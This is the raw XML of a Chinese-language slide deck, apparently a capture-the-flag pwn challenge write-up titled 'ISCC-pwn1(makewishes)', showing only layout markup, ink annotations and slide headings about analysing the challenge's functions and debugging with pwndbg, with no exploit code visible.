              <a:t>begingame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>()</a:t>
            </a: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E520E9-5803-8B9B-660D-492939D3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99" y="2707379"/>
            <a:ext cx="9034311" cy="30671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39EFBE-6375-E5F4-383E-BEE331CF0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32" y="1542062"/>
            <a:ext cx="7881736" cy="6942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E774A1A-297F-FAC7-6015-1671755597D8}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5826981" y="2277424"/>
              <a:ext cx="1559880" cy="126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E774A1A-297F-FAC7-6015-1671755597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8341" y="2268784"/>
                <a:ext cx="1577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0D59429-8967-EABE-3BCD-6217E80C7915}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2250021" y="5136544"/>
              <a:ext cx="2688840" cy="554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0D59429-8967-EABE-3BCD-6217E80C79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1021" y="5127544"/>
                <a:ext cx="270648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93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（一）题目初探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70ABE0-0A21-DF8D-1D38-26D19630C6D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="681318" y="1171976"/>
            <a:ext cx="831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分析题目逻辑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>begingame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20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8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2261" y="252798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E443AC76-9127-2D0F-C117-AFE955384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860" y="1544283"/>
            <a:ext cx="6733540" cy="5020362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CE62CE41-A93E-87F3-4629-DAFFCD65E2F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3073701" y="3431224"/>
            <a:ext cx="505080" cy="612360"/>
            <a:chOff x="3073701" y="3431224"/>
            <a:chExt cx="505080" cy="6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40CC7E4-D69A-145A-D4C1-9E841DD81B2E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3326421" y="3523024"/>
                <a:ext cx="17640" cy="2498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40CC7E4-D69A-145A-D4C1-9E841DD81B2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17781" y="3514384"/>
                  <a:ext cx="352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74A439A-FC55-902B-4186-C565C41780FE}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3073701" y="3431224"/>
                <a:ext cx="505080" cy="6123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74A439A-FC55-902B-4186-C565C41780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64701" y="3422224"/>
                  <a:ext cx="522720" cy="63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024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（一）题目初探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70ABE0-0A21-DF8D-1D38-26D19630C6D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="663389" y="1239621"/>
            <a:ext cx="831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分析题目逻辑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>secondwish</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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8DD8279-E972-3FF7-6F3C-E7973C2B1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929" y="1979756"/>
            <a:ext cx="9053459" cy="38652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8A70C20-327E-D092-9CD5-1D24F2C9531A}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5118861" y="2867824"/>
              <a:ext cx="975960" cy="100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8A70C20-327E-D092-9CD5-1D24F2C953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10221" y="2859184"/>
                <a:ext cx="9936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D088151-8EF7-DD0E-83AD-1278427025DD}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3451341" y="4947904"/>
              <a:ext cx="1029960" cy="370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D088151-8EF7-DD0E-83AD-1278427025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42701" y="4938904"/>
                <a:ext cx="10476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9EFF582-D0C7-DD7D-9287-E9111FB8F136}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5286621" y="3370384"/>
              <a:ext cx="325800" cy="3272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9EFF582-D0C7-DD7D-9287-E9111FB8F1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77981" y="3361384"/>
                <a:ext cx="34344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5D13CF5-2EC6-BB70-B5CC-3FD9BA804269}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7153581" y="3469384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5D13CF5-2EC6-BB70-B5CC-3FD9BA804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4581" y="346038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2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（一）题目初探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70ABE0-0A21-DF8D-1D38-26D19630C6D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="681318" y="1171976"/>
            <a:ext cx="831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分析题目逻辑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>begingame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E443AC76-9127-2D0F-C117-AFE955384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860" y="1544283"/>
            <a:ext cx="6733540" cy="5020362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C0EFA92-0565-7C2B-46E1-E4A8421A2994}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3217701" y="4123144"/>
            <a:ext cx="297000" cy="1014840"/>
            <a:chOff x="3217701" y="4123144"/>
            <a:chExt cx="29700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20D61EDF-7F64-AC7E-0F8D-87AAD82BA1EA}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3217701" y="4141504"/>
                <a:ext cx="297000" cy="99648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20D61EDF-7F64-AC7E-0F8D-87AAD82BA1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08701" y="4132504"/>
                  <a:ext cx="314640" cy="10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D5F33C3-ED60-390F-F696-21169B080C4E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3307701" y="4123144"/>
                <a:ext cx="198000" cy="1249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D5F33C3-ED60-390F-F696-21169B080C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99061" y="4114504"/>
                  <a:ext cx="21564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101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D915-19E8-5725-62B9-4621FBA4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68"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（一）题目初探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70ABE0-0A21-DF8D-1D38-26D19630C6D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="591671" y="1171976"/>
            <a:ext cx="831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分析题目逻辑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>thirdwish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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3774261" y="363066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6694A-DEE0-36CA-8C24-85D7AFBE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261" y="36216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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3164421" y="417750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45B563D-143B-080E-6CFF-1603676E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5421" y="4168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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3710901" y="253662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ABCC14E-3019-DE94-4810-DDBD97F59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901" y="25276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F794570A-6554-98BD-F04D-DE70AC6BA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578" y="1779622"/>
            <a:ext cx="8310282" cy="4199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BB6A6A92-C0DA-0D70-2FE6-29B1247169EA}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5764341" y="2644264"/>
              <a:ext cx="1217880" cy="745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BB6A6A92-C0DA-0D70-2FE6-29B1247169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5341" y="2635264"/>
                <a:ext cx="12355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5985AFA-3F4C-94BF-B839-ECF81F01FC5C}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4043181" y="5009464"/>
              <a:ext cx="1155600" cy="223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5985AFA-3F4C-94BF-B839-ECF81F01FC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34181" y="5000464"/>
                <a:ext cx="117324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06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528</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>78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ISCC-pwn1(makewishes)</vt:lpstr>
      <vt:lpstr>（一）题目初探-静态分析</vt:lpstr>
      <vt:lpstr>（一）题目初探</vt:lpstr>
      <vt:lpstr>（一）题目初探</vt:lpstr>
      <vt:lpstr>（一）题目初探</vt:lpstr>
      <vt:lpstr>（一）题目初探</vt:lpstr>
      <vt:lpstr>（一）题目初探</vt:lpstr>
      <vt:lpstr>（一）题目初探</vt:lpstr>
      <vt:lpstr>（一）题目初探</vt:lpstr>
      <vt:lpstr>（一）题目初探</vt:lpstr>
      <vt:lpstr>（一）题目初探</vt:lpstr>
      <vt:lpstr>（一）题目初探</vt:lpstr>
      <vt:lpstr>（二）动态调试-pwndbg</vt:lpstr>
      <vt:lpstr>（二）动态调试-pwndbg</vt:lpstr>
      <vt:lpstr>（二）动态调试-pwndbg</vt:lpstr>
      <vt:lpstr>（二）动态调试-pwndbg</vt:lpstr>
      <vt:lpstr>（二）动态调试-pwndbg</vt:lpstr>
      <vt:lpstr>（二）动态调试-pwndbg</vt:lpstr>
      <vt:lpstr>（二）动态调试-pwndbg</vt:lpstr>
      <vt:lpstr>（二）动态调试-pwndbg</vt:lpstr>
      <vt:lpstr>（二）动态调试-pwndbg</vt:lpstr>
      <vt:lpstr>（二）动态调试-pwndbg</vt:lpstr>
      <vt:lpstr>（二）动态调试-pwndbg</vt:lpstr>
      <vt:lpstr>（二）动态调试-pwndbg</vt:lpstr>
      <vt:lpstr>（二）动态调试-pwndbg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ISCC-pwn1(makewishes)</dc:title>
  <dc:creator>凡豪 薛</dc:creator>
  <cp:lastModifiedBy>凡豪 薛</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-05-13T07:38:32Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-24T09:14:55Z</dcterms:modified>
</cp:coreProperties>
</file>